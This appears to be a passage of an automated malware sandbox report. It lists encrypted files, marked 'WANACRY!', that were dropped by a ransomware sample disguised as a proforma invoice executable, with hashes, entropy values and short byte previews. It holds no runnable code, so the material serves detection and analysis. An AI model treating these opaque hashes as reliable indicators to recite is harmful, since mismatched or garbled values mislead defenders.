                                                          SHA-512:5DF6DAFC90D4410DD22236907E81B6D0AD15A37411BDDE6FD47994E2FFA56039C43E6C995A11C176289F016739CC52223CA7832F22B835671879CA4F8EB7C3E3
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):702504
                                                          Entropy (8bit):7.999722987918677
                                                          Encrypted:true
                                                          SSDEEP:12288:T2zxk4xnOdDOQXFVXzZ22XsLnuFagyH52t7FZnNJGizw5UZIotBvhm:T2zLnOd6QXTXd22LYvHAfd85UZIwZm
                                                          MD5:B3CAFDC5A323DB9A787526E0C03F0CA1
                                                          SHA1:97A89B0700E46ABE5396422974A6EE29BE51E380
                                                          SHA-256:9F5379F01EE711CF441DB2C7B33B5D193D614EC4445A58FF01945D4697C057DA
                                                          SHA-512:72A5588E8DA046E7FFE56218F4BA85D544D44A58F9E756389CDBA1206EF8097C4BD6927BF68FFEF5886A7FA7490DEDDE56AE006B54DCC2D5577F0BD09D2477EB
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):97816
                                                          Entropy (8bit):7.9982805141954705
                                                          Encrypted:true
                                                          SSDEEP:1536:yeMaOGCNN8/aF09N4y6YOx/Bsv/rkHUnJqIUjkRWtip3Vm1lkmJaTSpcszILdytS:LXCNNy9Sy6YOxp+wH2JYEp34lkV2pc9P
                                                          MD5:9B316FE1A57B50A3A1E15A805BF4581E
                                                          SHA1:28B80480F837D59668BCE1AF760207C6A04B3C01
                                                          SHA-256:CB7855D3D50ABDBA2FA83869B60757090D92FB4F473FC19DF8E07B53F24328E7
                                                          SHA-512:9F2795B2B365147CEDAFBFA5687475AE19DC63C90FC98A6DF87DE3F236FE12D4D8BBF3064F783C0979B7103DA43780E6A0B9C9BA97E33673220FC3A8D0B52954
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1212760
                                                          Entropy (8bit):7.999849001794366
                                                          Encrypted:true
                                                          SSDEEP:24576:jjq+YbqWjBxVlfKc6xLvq2d8gFM0Vi9tNNQLjikOBCo9s7M6DtiEAVlI8H/5:jjwjBxVlr6xLv9m79T4ji79+M6DtihIo
                                                          MD5:53A4EAA4397790385B000AE3B4C0CB8D
                                                          SHA1:A00F3E2A9B3B682E96E3D1A9EACDFD1E472F0BFF
                                                          SHA-256:1E91D6B8AC55A2EBF0E034558043E7B4A3A2CB3D3C3C428D06AB5B2A83A52F59
                                                          SHA-512:5C73ABEA2B42DFDD5490E803721E0EB56F8F2253EC24F3711691C616F17034FBEBA26F19419C35B1DEE4AA2B6BBED97613852A71CE95FA0DEB0C3D23CFBF32A4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):46296
                                                          Entropy (8bit):7.995927961587632
                                                          Encrypted:true
                                                          SSDEEP:768:Bn5F1fGhfMQOKTiGID21g+pWd60QmeGd1WeAaRiSzEYfemDN:jbO/dGFS1nD0JcjSzEYfemN
                                                          MD5:C3C7E990C63E2DABA6805FE37AAEC013
                                                          SHA1:9AAB1EBAAB25F1CD8BCB21B65345440C1A2C6EB2
                                                          SHA-256:705D27AF1EEF3C0737DFB827BA79FB0FCA63FCE5B4229234C92A90706A20E8F5
                                                          SHA-512:09C38799B9FDA74BCD1C915F6B9A590D9F35C0C107A6A54271AAE03821318AE51AEF5547EEA2676B283305A5D58CCDEA9B3C144F02E87CBBBE2EE3F4427491DA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):53480
                                                          Entropy (8bit):7.996660161739034
                                                          Encrypted:true
                                                          SSDEEP:1536:FQJewMCrvLcnzDkQgG7E+suN1qxcaNVNk0hJd9Py:C3MCrzczDkQLj1qxdr9Py
                                                          MD5:27B0F0B716D2D10C75B966FCBA68361C
                                                          SHA1:43C0177B47BBEF06003B5365CE790D4885875B2B
                                                          SHA-256:4E6A332EB0003BE9312B246044F195598673EC4CED91CB71C0E820ADD08890F7
                                                          SHA-512:1E91EADA19521E2F3B8AE8272102927B71F15BD599DADC11BC03886BF8558F6034B9A53B79172EB1ADBF952BC975FA95E2A6D11D7A178D8959CACD15E0A66B89
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.. .SM..-.T...!...Cy.8?..'..7.1.>...~.]....Z...B.9~.....mev...O.... d.D....0.d......F..5..}.&3....Z.Nb...g..|[..4..OO....Q..s5......`%..z'..2..u..{>..6......e....t.|....3h....#.....;........N.[.....6.~1;..]L...w.......G.?...9I.....b$..51...................f..X...u.G,>. .*~.0...|Zt.}...#%x. .r...&>z.K...!o1....I..k...E..]...5.XD.;...._.].....R.V......._$y.\...H....kw0xK.JTx.n.l.W.f.(.Jkjj^K.:@.Q...s....hQz3.|..-...<..p.zQ..)...E..J...........7=....x8...5..)......!.ww.=Br0..._.....1.U3.^...1 .9].9.dD.B\.F..c..W...q.#..>{.........&...xz..Ta...!....'..........g.......X..bsC...8.H*..S.......-.ZK5@.Q[.0b..Z.60.R.....$.....@.%.l....<.1v.=.4.e-.7..6.JZ.vB:.h._3..e,..O.%.*.N$U...5..L]..y.v.huF....{.w+Pq.+YlZ)y'.....:..W...-.c......P..Z.X.D6A........%.X@w.^Q....~w.E........)...=R.......F.e..._...\z......v...?..V.Z..../..v...r..v`.6.]y...z..qO.p(.X..+OH.?....-....J..O-...B3+..K~4.m=W....d..^...F...&@[..P3..7.O..G..$..8.g...l.1...
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):18856
                                                          Entropy (8bit):7.989446892853039
                                                          Encrypted:false
                                                          SSDEEP:384:1nBg3oK9blansjds6qxokJxSQlcfiavaowX/nuEeY6F3qw:1BXK/akdrqF0Qqwou/nuZY6F3qw
                                                          MD5:1615A7F30CA985553A1129F5EF6145F2
                                                          SHA1:41D22E9B154818E152F555BB64A6B1E7D6DA608A
                                                          SHA-256:0DA7A0DDF1E562D28E3882149E65D42FEF118B08D231F6AD62BEFEDF2A05747B
                                                          SHA-512:A9AE21958C86648F3512DC9B867D717AFD411C54916FDA2043431A4FAA93C36DA6B726D0E36419FBCE90416B280A8C0E6B90ED75A01B86D3C7A54EE507AC1277
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!......C.J.......1......tS.....M.g....<8U.B.p..63.......).....|SY[...y..vF..J.S(...._......AH.E.e...OD..?..{L...........L..hY.......c..$.*.<..P.,}.Ga.P..[.^n..M..9.f..M.TU.......#<.!....5S...BOU.Y..&...}.2...w...q.x...MTk...!.._6....nP..r................H........pQl.......s...6...U.\:.6.J...!....\..*..)]...z..Eq.1.M.f.ATp...8.1{2.6....Lxf..~./'%........jkSt>..v..1...D.\2.(...p... V|'U.EN....y4v......9.........E..M...W.|.sj.F..d).......3.....?...)...`tf]...f..y.v}. `C{...'..;.q..UKr8.<..."....kzTp....+L..C..Q.L..9...?09.:!.K.../r..SS....7....|`l.B........9.b.j.I......0E.)O..;..`..^..n.+.E......].)..~j../\.N,..s.i.....N...Eua..@..@.5...f.d..+~R..2...X.....Q.5.*P.....:.,.M\+{.....@..a ......5C.E.....8.......5.j'dSv...`..Bh".....@....Y...!...V|.&JR.....[.....C.:.p.....{m..,..../..aQ.j....../p....7..,..............n2;.(W..P2..R..)eEdP`!..."xP..+.....N..Ha......J.Z,.,........k=P8Ll8.c..&.y.....G..;..Eg .>d.Qo.g..............c..X..I.`_'
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999890750452653
                                                          Encrypted:true
                                                          SSDEEP:24576:uXFTues+NCDBPhT0O9sEHy/TxT0CqHzdbRK0IYd7KH0PerG:KY0NEPh79s9lqHzTK3YdOYe6
                                                          MD5:0B7B5B13D14D423489CA86417EFCAF57
                                                          SHA1:414F53804C7E1D887C7ED2133FC5155F02181E5B
                                                          SHA-256:C90031A1BE48A8D6359AC13FD9C2DB6D4363E7590A19D7A31E4268EB7BE04761
                                                          SHA-512:95994D9E928A4DDF886378433EA1D628AB65259288980DDBD66ABCFDCCBC8EAF3AEFF8138DFFA110E12BF6D29F1D4B77EC184598B58767AB3B37706E3B42ABF3
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....~..L.n..1Q.`.........8<...r.......`v..8.h}3..$.N7A$TfDo.F.^........L..&.z.y...n.^o.....GH........Q.*g<:..,..\.e.....?......V.R<\..~...$U....#B..B...WbN<\...]O.......!n.h..!r.c.J.9#p..ima.;;..#O.Ns3.....P..M..$.o.N.q`.?....dO.3.*=....`...vYS...9............y0i.'......k. t.4)H....|..gh.t.%_*.`.w!......i....7<..... ..38l.a....>Pi...Z.!eVZMN..p..6..z...J...#..l..}......d.... A.A.mbp..Y.r......Lk*.5..v....M...2b.."..L..R...m.0...`R...A..H....:.:x.U=vjR.LE...pc.7.z....).<b..&....t&...H.+.w< ..W....\.{..I..,..U..>.S.[.....C..lS.@F.i#4.j...e..f. ..Z..2.h.|...HAxAp.W.Tl2............T..pm..h.%.MW.....dUPB.Z..oa.>..1S.T.^2.5.c...3r6."r..BF...P.Q.|.0.z\.....8..?..q-6.9..YQ ..........G~..q|..>X.C&......*..a...:.......V.L`...Z....z.jn.n|..S$N....S.5.bHE....";.b.H...[&...7.....Z&.r...R...<{.%Q.....:./."..K%R3....".b.A.gS...H.jo..w.:..x.n...h$..d.<...W.z..w.,...P.....d...b..Y..#..j2.^X..NH.>...|=|u.XlL.d.D.x..%....@.....,.>...v.(..X..e....|..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1573144
                                                          Entropy (8bit):7.999887105237829
                                                          Encrypted:true
                                                          SSDEEP:24576:qsKTEh1bKruwo+i5vpOPv9ldqX0vpMMf9bJ9vieDC5MFKP9SdZNmuGcBLI:MTMbuM5v8PBqXCXDviem5MFK41muZBLI
                                                          MD5:09DF1C45C6F899BC2138B25FE528A3FF
                                                          SHA1:1131B17F80ECD551072F1F93AA2E1AAEBFFB806A
                                                          SHA-256:864E020C74B679ABA455FF7500BD838FAF00825EA4D78610C846575C567533E1
                                                          SHA-512:E66EE233D5963585840B1960309EC69EC8D67E456CDFFE92AB3E63536E201681D6E7F0DF791B439FAAF1BF4A1AFD6662D050CCFD1F2F765C2E055314A53DF09B
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....q..8..N....(o.3pt...........A..q~.../...A0&.,X3t.s....3,.V3...&..3.2W...R.[._.[D..U]Hxq.U>'....o...............L...%..zzH.....3.&".9((...J...v.r..4a...K.N=T....4v..X*..QS......x...%.q....w;4j...eE.......$..hg...< ..$u...!.F>C....../z.O...............CF/.n..DS.".\*...s@....R..Zk..l..{s.O@.\..&|3*.0.....B....(G........9.....i.@6.p7..K../...'.ft:.f./O....pu.FF.A...K...#..zZ?...F.}+.W.(.....d....7$..j^....gN-...PX...^....'DXT.....B.].(.......(j|...;..h... .'qB.......q.....?....v.b3et;..]..3.jkIrx.L....T8.`9.?..3.Y......qO"..[AS`...w.V.......n.k,.u..+....z.....A.`_...^.....vHT:.....(f.?.K.,.YQ..~.:.-.A...D.?.1.c..J%.-3......:.e..z..4..q.]Z?. ..8Ng.OuO$.u.s87.WJWW\..qq.....P........\6l.V.)......U.k.)....v*....pE.....J.\60.W.N+.z.r..g....m$J....'...>.r_...L...T6..u^...n...OCo...dR...+.bv...<$....G.......1.%..z.b....XvI._....^..*.Fp.V..........[.N......X..r....6..U.R...-...G#.>....O.!..h..../.}R.....OA~j&...T.cP.....[.m..}..p..Y.>....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):91752
                                                          Entropy (8bit):7.998073211172385
                                                          Encrypted:true
                                                          SSDEEP:1536:eVEbsV01AM4RBEioBR4k8MCcp+BH4z5TMw+homJT33rcWCEV3V6OUT6nXtxB:OssNrEicR4kQcp+s5TSu43wQllUT6nh
                                                          MD5:3A2679865C51868E6C973328B164B698
                                                          SHA1:1EBF50CE7070B8F39F204B8B0B8630FC1BAFDBBE
                                                          SHA-256:878A7701A389F17B44A937563C421B01D5C5FD47A701154C098D12F4915BE050
                                                          SHA-512:06074A00E9BD98A7E0B53C3F3600C84F6F8368EC82F63A6DC95B537E6863BA208443369C4863CCC4DAAA52C21E869516AD689FEFF730F100E0CF5A4B02385CA4
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....Baq....A...\.G.!.WO.R.X\!..5./F.........*z.{..i..U'..Lq0.........7v~>Q..3w7.}....Q..V{...f.....4..T.q.bg.uCkc.....w*..d..+.......J....-..b......D..5.!../.qu.Q.[.&4.h.C0..I.pq.. ..E...9D.R.y.m.=...../.......}.....<.2?.+..hn^..Y.=)...W..(R..#(....De..........Q....!.......\.#.....+.*.`.=A...37._W..b......$/_"......pL...5.g.2n.g.....R\Mm...{.w.,.!kV....5?'.sc"...;X..~.Z...M.O.,>SB.>.....a.....]..b..d.22.F...4.NVwV..l....d.......@....Y.gl....t..V;..o..A>....R..m&.OR..^......~..h.$&..%.s...f...7..0.qlS.$..6#...Rm...H.E..h7W......0.K.C.c5.l...............>x..;..P+.T...2.....~..."O.............n...{.@..wO.....{.b/>.`...|....}.".8....$}.q..8.....d.O..P.1...C...xg.wx.".R<.A..W.m.u._(S..ep.).fI......I.3...!.........c.N..{...ezZ.7.....*\..+...j.:../..I..X0.fh.L....{...H..._.;.b......N...E..].P....S..D(C...f.....c..O7$/k..(...'S.4A.......V.a..>...."a.74..)]......Q\...i...jHw=.2+d*(.y.[.v......(..-..0.....*Q...MV.......B;Z/...U...6.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):15160
                                                          Entropy (8bit):7.987921710559333
                                                          Encrypted:false
                                                          SSDEEP:384:vxnaFziFBgetC+he+d/gd5+eQEdns+UCR4BcFzW0bBR:ZaiDLgygd5+eQE9sER4etZ
                                                          MD5:4320BB19799471975A703C9D292A1FAE
                                                          SHA1:6B36F6E8904AC3D4E9BA350C8F71313E983C7F32
                                                          SHA-256:6707D3BCFC153BBDBAFF8B3754578EB24B09E633077B7788F7556C5FDFC5D19C
                                                          SHA-512:24E03342253350827C5D37D06DF376C5962B976A25F3B337ECF1EE601100E377067E7DDCBE76F28F34FE1571CA46FF4EFF7F8F65D245D34108233F733B995072
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....i+.. .Z.q"I1..9.......DF6....T..G.....n_.....z.w}s...,.y.c..s.#...l...34.N.Y..S..........^.-.85..^.WD4.Y.0..j{$...^....,.a~....6..&e....W..^.......?.6.M..$.I..K.i}h.R]d.{...@..x\o&"..<.-...Y....j.1xZ.^y..R........8>...f;Zr.6}..?.v..tf9.,.'..G......:.......}I.]....+W.5..`...4.6.).....n%BR.i.v...Z....,....l...tl@.....e6...<...(.H.K`.f...i"!.;...W.\....r....1..;.a.S......\......f.......&.Uj..W#!......x-.....n.X[K....wp.?.....x.^.Iu.\c.6..../..\....X.......>.P...qd...../...`A....w..*.....X.@....\]..i..8..c......Ri.."}.>7..."`....D;.Tp.{.bg.h...l..Q.1Fg...5Hy...G...u.Ti....^K.f......+6.4...........7..N.qt.....N8......m...?Wg..QR...*...5.s2.....+=.....7.3e....e..@....~........~k..(1m.h..n....E.EN...R......_..P.B....6!G....< ....wR..w...|.6.6T)...../\.G..qf...~........".FD3.i-.f.;t.M^"....y..!B'...KN....6N..^..nM.SYg./2*..~.............19..~j..k,.I...(6..U.....l.../..<.../....%7......"...s...6.......6.].im...5...]#..
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1240
                                                          Entropy (8bit):7.85211329815188
                                                          Encrypted:false
                                                          SSDEEP:24:bkhb1iwNQSZr7xmb4vMEzU6lZxDTKtpibRki94R6ZTjXoFmMnX8qp:bkhbKQ7xmdEzFZxDIMdP4UZTwX8e
                                                          MD5:F6D630C3B97FA74819F9C1ADC805842F
                                                          SHA1:6675E6DBE21991C76184DDD4CA24DB9D27922BAF
                                                          SHA-256:19EC14B5C74E39CF78FC1B0018A57CF48C25866A94BB061E137A1E018CB2D533
                                                          SHA-512:DFB41396D98F6170C9DCFAFFD3E3F376688ECBF03EB21B9AD04CE7627E826B2595AEE5E3C0589DDAAB4219CA1D92D861EB2D2863A1B6715913418D71AF074E3B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):45736
                                                          Entropy (8bit):7.9953329263347515
                                                          Encrypted:true
                                                          SSDEEP:768:jbufkD8X9a5+udN5VbxoV+QX7uZ148ghofA6FLBUfwUNyxa+WVJ34DpfU35Brz36:jaf08X9KbPxhmuZ1L7Va+4JoUJBrpvGV
                                                          MD5:612FC3133952349E230B1CFE5BC2C218
                                                          SHA1:0D26948E9BB764F67486548D09763255500050AE
                                                          SHA-256:192E4C5B714AEA88BF9834A7EFE7C2D76BCB24E01E2396869F60C169634D13C8
                                                          SHA-512:2CEE9BB4B13A906159DAFDB195823E8308F9485FD5F2EE1FB27FC2B0253BADD90AC80723EE4AB0084E903E0ED1E2EE531EF3B392CB25F9C18C8AB830900AE4FA
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):349176
                                                          Entropy (8bit):7.999482463761785
                                                          Encrypted:true
                                                          SSDEEP:6144:69p8oevnHDltfhcJUDUTIHgHUkbeCe7HT+kJXZb3OVDkgTmpTEGEtT/:5vHDlP7U4gHbbeCe7z+kJXZQgJpW/
                                                          MD5:046821D3CF28BBDB39C59EF5DB747FF0
                                                          SHA1:E964BAEE38C32D65C8FF2C52B837331AECB41CD8
                                                          SHA-256:EF45217960A5D684FCA383521FB9097B5BAF405C3A89A39FCB0007AFB35CF3A8
                                                          SHA-512:936F9F7B4531AA57A9520EB4A3A40EB4990E7025CB2BDA5AD407DD7DCE79146E3109AF58719C6A1749B00A72AB8E6048BBCD253273F44CA9DB6614F464C184F6
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):127752
                                                          Entropy (8bit):7.998624961542022
                                                          Encrypted:true
                                                          SSDEEP:3072:F1on50LC1r4C2A/fGzgv4gQRFpUaOQv/ub2Sb9I:InNJLG2g3aaOMWh2
                                                          MD5:AECE63CB3F4ECA5E15DFE4277EDFABA1
                                                          SHA1:3A10ACF0992F258BC4265B50C0D2FBF19EB797B7
                                                          SHA-256:3CBDBD33E4F901C8C1727A380CF44AF04BAA01B704F58826029392DC72EDA567
                                                          SHA-512:E39E38897276DD2DC246339AFF51F4A0D7FF818F75E6D6759D731A35EA35AF363EC875DC6BFCA6FBD11E0E0EAA20F1FFFFBB9C18B747910A9DDD809DF9888EEC
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):234376
                                                          Entropy (8bit):7.9991731149501195
                                                          Encrypted:true
                                                          SSDEEP:6144:NNpxAwqvcC1Dcl56UfRWbvDZ05VaA0igqqNI:NNpxNkL1DclMUZWLZ2gZI
                                                          MD5:CFCAB5EA7DCD6737618CA67D949A06E5
                                                          SHA1:7859F99648237DC62325356D5F4A330182A1FD20
                                                          SHA-256:418CF230DB8E35B649ECC4C69DD2A4C0D44049E3A51B68153CAE5FE0298805E4
                                                          SHA-512:6E043E5A9FDC069804BCC2432B8FAA4EECE6D9A56F994B483320DFB2D4CCF49AC640DDBCDEB7037CD5AD9D36300232C77710A56AAE6973761A63F93D4A637BC9
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2392
                                                          Entropy (8bit):7.922641736574049
                                                          Encrypted:false
                                                          SSDEEP:48:bknKWlAYaMwJIal5nZCtYabfQn7+n4GW6Kyco3ky7U0K:otfuIallArbI7+n4GW6JcYkkU0K
                                                          MD5:9959AC3CCD6C0818221C52A94723C403
                                                          SHA1:5685B768D2C80C5E1C70EF7B5E0CF8B3D3985DA5
                                                          SHA-256:B9C246FE81ABAACB1DD60D6363B235A6B6C36412B420A888CEE67BFDF4D2BF71
                                                          SHA-512:22F29F4954DD85DAAE868268C4FC3565DEB8CCAD294EF99B859D52F6B142C64D8E15D53FFD8AB19C72860E614A83134B21A15D9F29937A1338E61AE8F641D518
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2392
                                                          Entropy (8bit):7.921916540670038
                                                          Encrypted:false
                                                          SSDEEP:48:bkxOeLFpHPm8RhxMox78XOIrHeNMfofUUA3/1DFka13SWx/3hmYFy:oxOerHPja88eMf0QdDOaRv5VFy
                                                          MD5:F9B0AA8EF2BA52120294F7A6D86AA65A
                                                          SHA1:70B51B6FEE3D1B3E4F7AD65B31E9A878086C2D7D
                                                          SHA-256:F85FC68905264CA8C11FAE3540178554249BC4E2709AF0772E189962255A1EE2
                                                          SHA-512:0BD5F21BEEB691B9BEA12EA8A5E760C38AE9B9D93E2C65E195E84875AB94C6F0D7C073CEA461C4C779BB5E838A5B18C9B4E3EBCE7602D60FFE7C959E8299E7D8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):296
                                                          Entropy (8bit):7.18107255835841
                                                          Encrypted:false
                                                          SSDEEP:6:bkEliefFB7FQuY27Lf8hZW4ZWMEc9RRAHKVtK0koEc07ilo/qVhqPtR1Mz2AUfn:bkEcsFBCuY28PWHMEcTVtKzo707iIqVW
                                                          MD5:F14C237045EC49722A3EA4CB048CC4D3
                                                          SHA1:FA6C7A17A1AE7026A5FF54B9F20948E3AE275544
                                                          SHA-256:E5C7E373E04BBF973E428F7DCB2B70A0908D6593A2A33E727B25E850BAC622F0
                                                          SHA-512:8AB24BFF5310827B565A24142C6812C5FDC491D841E0B6B894D031C56CA3034A9874D2C6D0909BC8D6B180616C4BE78D45F8A7A97C9DB4C60B532A3FE5D0266D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....u(JU..-..!..}a.>k...H.tt..%..:^.X.k.....*3..8......A'7..`+...a..L..I..h....|.bF.,....O.....;kqJ.A..>...4.OQ+..9..$...ta..+4..3r!...dm..S.H.:.....U........U..b...M.|...S?.+.n~..G.........$o..l&.Sf.....p_..mC...UsQ.....KB.5.A."J...A..i...(..).=#.............)SM...9..6..D:
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):192872
                                                          Entropy (8bit):7.999060047902946
                                                          Encrypted:true
                                                          SSDEEP:3072:b/DWQZUWYUySdW41VaNQaC/QYIox5GltwU3PM6biPL5YdqKYMhJvPDO6U6tzEG3I:2JH7iW4zj9/Qboxs7tPM6buL5z7MzvLw
                                                          MD5:3BA6D669B9A240DBC6B55F894983370D
                                                          SHA1:BFC4442283CCAEF644DB1D696EDCA57AC883DCA3
                                                          SHA-256:33B8D5B1A7EE8A2F646610139C5D4782FD5A2E2CABFF57CE7BA7F0897A947396
                                                          SHA-512:569E7906E74950827F40157152DC5279F006D53DF200E6778C51661E920930CAB3F0D352770A43E54D9520C7C2B18FFEAE181B3C8978B9F84EB111B1D1753F59
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....L.r..u.X..+..[.z1Ps..X.5..".Y).v.[.B.u..#.Tu......6.Hw3.h.:(..>,..f.5.mDj7...wc1...(.y.!.....M....|..~...l81...l.....e.\..i...V..8.oo p.~.*6..S...%i.I{.V........#.'.;L{..;..C.......n.?.%.M..c....V..u.>..w]W7.A..1.a..3....G+..g.X.e..x.Uf.Q\...n....N..........R.8+2....e )...E....R_YS..|..U.?.i....G:r...z......C....$N.Tp.G=9./S...}`.....8]-.3..x.t~..M.3....F....-...o....,.d.el7..^....3....R"...<..O%9&.Y...Q.bg.O..5.......W..Q.{3.ZY...U>t)....}...I.e.....Y.I...|...*.'M..J........K)1...VF...r.z!V.^."....{..........^.8@......2JT.A...........<#z.lO.....{.?..B0Xgn...Ve0..........44[m..V..9...DX...l...bG...!_..b.8..=0..mG>..f.V...Gf....p.V..#..3802zR.^.uG.)...t.-....!.....4...Q.]H.....Y.j...c.wJ."8........}.......&..f.:E..<w...K...V .l:..(.Z.O.:@<P...,2......%..e............q...H..A./H)<...Qo.@)..O..H..`.H.g.|........j..5...:G...b..9r...Z.PK(cO....7.....C\.u.q!.......G.'.....O.r.....>..^GN..u.Q..vP..a4.Q...i..M;...sE.pj..Vm....K(.
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):131672
                                                          Entropy (8bit):7.998758315323608
                                                          Encrypted:true
                                                          SSDEEP:3072:Cuoyh5x9MxVLgjmpEXZMuUCPsSsjnGc6BxLesC1klzt+xJrsIGo/mO:Cy5xezLgjmp0ZMuBPRsjnGdBxWkJtgJ5
                                                          MD5:D8146ECA3E2C57E2D4E1E50C215292B9
                                                          SHA1:22E2CF284A21DC30EED4CA58EA821217ADBAE6E3
                                                          SHA-256:811EAD7B7EFCAF0A8B8A811B3BA920AE82AD15AFFB0EC8D565B17ECDEFD9ED07
                                                          SHA-512:4EDCB4396FA453A37F863E5F29FEB7107C8B4B17ECB4B4734733F24D1E721A3E6303584AE13C4E49E06C6D43EBAF0F6CC56CAF72EE7AE0A0A0A1ECBB881FCC49
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....h.....Q.[.0t.H#.Z...iF.......^..b.3.`KTU4 ... ....Z...$[0... ...D.....T..s.7.../.u..cs...../..3..0.z?.[L..y._...q'....5o.K]...>.[...S.....R....hyY$.>Ptv..F.....*...b,L.s.........N.<..9.DpQ)....$..?[K..q.1......qW..t.... Q ...=..:.G. l....K.r.-......<.........C..G.qg[...N.....+*M..K.1.<.V^.}......N..P.......$............ .H.....*....B..k.R%7..O...... @),..T...Ie.kYy....e,.L<..LtR....M.U&.+k..F..Sq.0$3.}m.t.....?....<.w.N..H.D...$8..?.P'g.j. H07g..o.US.7i..V1.....i..R......2..T........zC......l .l/...e..WK..j..... ....x.y.1Y.R.]]~I.t....1...8}".xJ. ....$wr...9.I.n...T..h.........*.X.6.|o..;..F ..7t........X[..!......s.....F....Lqy.."....3!IR..>...h\.Z<....*#.1/.....x.. ...2.t...n.~..T4.2.(.4..r.:..2......i...T=>..'..e....Uk"...,._...0:.k.#......V.....{...BN.0.iM..m[[....[.+F.....*....n.6-K.:Z...p' ........0vvJ^CCo.6[(.5".v..Ny."....u&.R]......C.[.)MLD...^...1(..*p0/.|..b("....... .;..{Z.f.i..J..]DZw.. .i.....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):17784
                                                          Entropy (8bit):7.990439122444194
                                                          Encrypted:true
                                                          SSDEEP:384:snGZJgePrlvFvkFMZ6X9a1dFZj5dgeSJ6+Q1yETPb8SIMuJicoF:snKJgeP/6X9afFXdr+hSIMuPK
                                                          MD5:E97C9CEEC102FDDC361C22F888765D94
                                                          SHA1:A904D289F3AA8D06E96CBF00542412CCD2461A12
                                                          SHA-256:F5A8077B0372A49FEA2FAAB3C9FB412CD48802B6CB8BA353A6F0A39E325C1DBA
                                                          SHA-512:C8FBE2BD7B20D802C8CE428E32479B373F075E461E345584BCCE95E052BEABD371EEC27159DA02582B84DC255A17099964B1FA208BF00B0E9BC0F3ABD85763EE
                                                          Malicious:true
